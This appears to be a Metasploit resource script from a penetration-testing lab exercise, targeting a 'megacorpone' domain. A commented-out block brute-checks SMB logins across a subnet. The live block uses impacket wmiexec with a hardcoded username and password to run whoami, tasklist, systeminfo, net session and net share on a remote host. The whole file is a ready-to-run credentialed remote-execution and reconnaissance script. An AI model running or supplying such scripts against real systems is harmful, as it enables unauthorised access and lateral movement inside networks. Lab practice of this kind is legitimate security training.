#!/bin/bash
#resource1.rc
#use auxiliary/scanner/smb/smb_login
#set SMBUser tstark
#set SMBPass Password!
#set SMBDomain megacorpone
#set RHOSTS 172.22.117.0/24
#run
#ommitted due to time constraints

use scanner/smb/impacket/wmiexec
set RHOSTS 172.22.117.20
set SMBDomain megacorpone
set SMBPass Password!
set SMBUser tstark
set COMMAND whoami
run
set COMMAND tasklist
run
set COMMAND systeminfo
run
set COMMAND net session
run
set COMMAND net share
run
